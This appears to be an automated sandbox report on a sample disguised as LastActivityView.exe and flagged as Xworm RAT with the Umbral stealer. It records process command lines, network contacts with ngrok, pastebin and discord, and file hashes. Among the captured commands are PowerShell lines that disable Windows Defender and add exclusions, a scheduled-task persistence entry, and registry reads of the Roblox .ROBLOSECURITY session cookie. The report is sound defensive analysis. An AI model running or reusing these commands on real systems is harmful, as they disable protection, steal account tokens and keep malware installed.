Malware Analysis Report

2024-10-10 10:07

Sample ID 240506-3kw61sbe22
Target LastActivityView.exe
SHA256 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
Tags
umbral xworm execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b

Threat Level: Known bad

The file LastActivityView.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan

Xworm family

Detect Umbral payload

Xworm

Umbral

Detect Xworm Payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Enumerates physical storage devices

Unsigned PE

Runs ping.exe

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-06 23:34

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-06 23:34

Reported

2024-05-06 23:37

Platform

win10-20240404-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\syjcie.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1448 wrote to memory of 96 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 96 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\schtasks.exe
PID 1448 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\schtasks.exe
PID 1448 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Users\Admin\AppData\Local\Temp\syjcie.exe
PID 1448 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Users\Admin\AppData\Local\Temp\syjcie.exe
PID 4668 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\attrib.exe
PID 4668 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\attrib.exe
PID 4668 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\cmd.exe
PID 4668 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\cmd.exe
PID 4908 wrote to memory of 1096 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4908 wrote to memory of 1096 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe

"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"

C:\Users\Admin\AppData\Local\Temp\syjcie.exe

"C:\Users\Admin\AppData\Local\Temp\syjcie.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\syjcie.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\syjcie.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\syjcie.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 52.28.112.211:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 211.112.28.52.in-addr.arpa udp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 52.28.112.211:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 82.139.121.3.in-addr.arpa udp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
DE 3.121.139.82:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 3.127.253.86:19380 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp
DE 3.127.253.86:19380 4.tcp.eu.ngrok.io tcp
DE 3.127.253.86:19380 4.tcp.eu.ngrok.io tcp
DE 3.127.253.86:19380 4.tcp.eu.ngrok.io tcp

Files

memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-1-0x0000000000AD0000-0x0000000000AEC000-memory.dmp

memory/1448-2-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/96-7-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/96-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/96-8-0x00000228EE320000-0x00000228EE342000-memory.dmp

memory/96-12-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/96-13-0x00000228EE4D0000-0x00000228EE546000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqrkwlfb.uup.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/96-51-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 03c0e5299730d7840dc4ee907c2d7e2a
SHA1 ad7731702af04363af05807bdcd034e87073ced2
SHA256 f3a484a2fb1e7e859c6d7950be2ebecd667e3f42c244afed7dd2b4477e83861b
SHA512 216c32835ba4024985460655c94aee41873285a7ef8b37a88970a552760cd2fd66fef02b594a3ed921433208a275d13421cfdf45bd554123f20c2ab58c2340e9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 12bcbfc36299cc2f49f07e4c89e87029
SHA1 3bb2528216e4d71ec44c57398111d40ab3b75bc7
SHA256 ef41ffde899433aaedb44745f4d43e1a486cd383c5b662f9c9279ee249335dad
SHA512 1ac4211fc339564cb2cb15e990bf3b8f5c7bace629a3f65444f526bf31c9b541bba0c65ac30145c67bac998fa3656b02b154fa9516a323271363e00b28fc68a7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4974291e85a04444b7be80b193c8a99
SHA1 4322a84e7b2207c02ba3fe6acf1e7ee295c8eba9
SHA256 e733390b57c1f323c7349bb6a65e8f4fe0b5b815f40a92897d4f44ac1c9ca871
SHA512 35f8976633cbf917dc2609272fc981c736b42371ff1438ce178eb4d42b22bdf6a8aa542d620c6a201d3d7fb6dfbe10f110c5411bf44f2ee6f1cda1a151dc7ba5

memory/1448-186-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-187-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-188-0x000000001B7D0000-0x000000001B7DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\syjcie.exe

MD5 f94e3703ca371767d93f5a88b74fbee7
SHA1 80530e8ffb3fc7d2c36e339b70bcae0d0014b7f5
SHA256 954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7
SHA512 ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066

memory/4668-194-0x0000016E260D0000-0x0000016E26110000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5477d94aecd44c4e5c1463c1c0847589
SHA1 3f3c4f3a75229d0eccaf568c85697060f41bae9a
SHA256 d8ea4c44242969f01dd40441b010d844747fec463c229b13c2836854cf7ccfc1
SHA512 2bba1edfdc34af16f01d8fdb4c2730ad577a219721b6c8241088ce517334a7309d8d6d246f98851d73b1eeee40a6535ecdd41d517b9b0d207cf5e11762f12375

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 01b8d3a45328a2dff7f64c4bb9747dec
SHA1 c33eb4823a32745cdccadb81d34ae9b325ab39c8
SHA256 1425ed0a9cccab81ef6493ce8efe445e84e0d8567d8e0f640721c5cc79ac7697
